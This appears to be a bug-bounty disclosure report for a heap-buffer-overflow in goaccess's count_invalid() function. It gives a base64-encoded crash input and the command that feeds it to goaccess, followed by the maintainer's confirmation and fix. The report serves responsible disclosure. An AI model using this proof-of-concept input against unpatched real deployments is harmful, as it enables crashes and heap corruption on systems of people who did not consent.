Heap-based Buffer Overflow in allinurl/goaccess

Valid

Reported on

Nov 23rd 2021


Description

Good evening, I hope you're doing well during these challenging times. During recent research, we discovered a heap-buffer-overflow vulnerability impacting count_invalid() on line 555 of src/gstorage.c. It appears that this is caused by an excessive number of invalid log strings combined with no bounds checking in this area of code.

Proof of Concept

First compile goaccess with clang + address sanitizer. I used clang-12 on ubuntu 18.04.whatever.

Then...

echo "H4sICChinGEAA3Rlc3QwMDAwAO1Y3WsTQRC/gA8SCAhizYPKuPUrxNzt7V2T5q5CSo0cqFVMqw8h
L8WAhZIUFV/138w/4YtgH3Vn7yN7173PRgOlSxIum5nZnd/8ZnY2LjBK6vzFaE9nts3fTDe7XRhT
0uZzxv78m8Eoc2jf+VBXiDFLiFDKTIdSFDMp0An84eN7OKHSY4HprqQHhLkwcsF73dx/0z8xCd8d
BbJjgKc2sKm7Lus4fHusC9YL8lDpSbgUbnE7XGoCxBtagfwY54a7z+FkWtLL29qPst5dj3n3ZEA6
K/dQbFNoRNF1TNlh9W7PnFA8IkFdiFHZUqh8/NXYsiK5NMxYDLMaoQJ4DrUuAOjB4chtwa3TU4Q+
fWuyEbghgNyJ04QThQMJbZLNN5bLN2GIB+Tzl+P5zHnAIiBL0AIdNOR13y1FmtC+u5SXzH70zaJa
Wk7iXFGG7gpMp0cveaAiBlGykQUPCHUhmIOhOpGYvY3fl7pbcd1UKnCjlkPt0Oh8hhhEVmhuFJ2l
g0rolJqPwpDX4hzocw4E4XcYvcfwU225l2IZEcFntMFMGC8lakHYO2UyZhoOHy8DCqdKCsM/+TVH
+Jj0DX8K7ZUoO1Urwx7tj67q/VW9v6r366/3j9dd7y9cYHVRYIMq6Zlq0r2XwVhBsGmBYOcSUzxM
qg5/pbJaqYemn+ut1eX6pHCunyMY/pJJsgSXBhT38WxoNUOCXM5eQi/ZS9xZRd/wKr1vyLMZRIWm
R8VK0yx1iVSL2OsaMSaUa/tItvteiSM0/eSL4onMXMXRR1nxslf98MxtvSI3k8mMUiEICEABZ3Pp
et/vwIqXSu2aplW8YSnl5QKYTDI340+eMg2G9MdOLzvPg5iCd3Dw1sBDmCDdDgUBgWPvtQC7lUZj
43ej0VhI4+fCN7iYyX1wThdDs26tmlbT5opqvO4bXV6qXqi0Hv3P0nqWd2CGc13YU6/lT/VSvLQT
14WnKIbPSXeq344HhW/HlyEUKMwz8uYENuXCch7/Xz7+JU8tufuuVbzy/dPz6i+VUGbO9hYAAA==" | base64 -d > /tmp/test0000.gz && gunzip /tmp/test0000.gz

Command line: cat /tmp/test0000 | ./goaccess -p /dev/null -f - Then select a combined log format or a common log format. Does NOT crash with the Squid Native Format or W3C.

Stack trace is hard to read due to some sort of formatting issue, but we can see SUMMARY: AddressSanitizer: heap-buffer-overflow /root/goaccess/src/gstorage.c:555:38 in count_invalid. Screenshot: https://i.imgur.com/DAvvHAA.png

Impact

This vulnerability is capable of crashing the software, heap corruption, and other unintended consequences of reading past the buffer.

We are processing your report and will contact the allinurl/goaccess team within 24 hours. 11 days ago
We have contacted a member of the allinurl/goaccess team and are waiting to hear back 10 days ago
Gerardo O. validated this vulnerability 10 days ago
Geeknik Labs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Gerardo O.
9 days ago

Maintainer


Thanks so much for reporting this issue. I've pushed upstream a fix that addresses this problem. I'll work on a new build and make sure to release v1.5.3 asap.

Gerardo O. confirmed that a fix has been merged on 977424 8 days ago
Gerardo O. has been awarded the fix bounty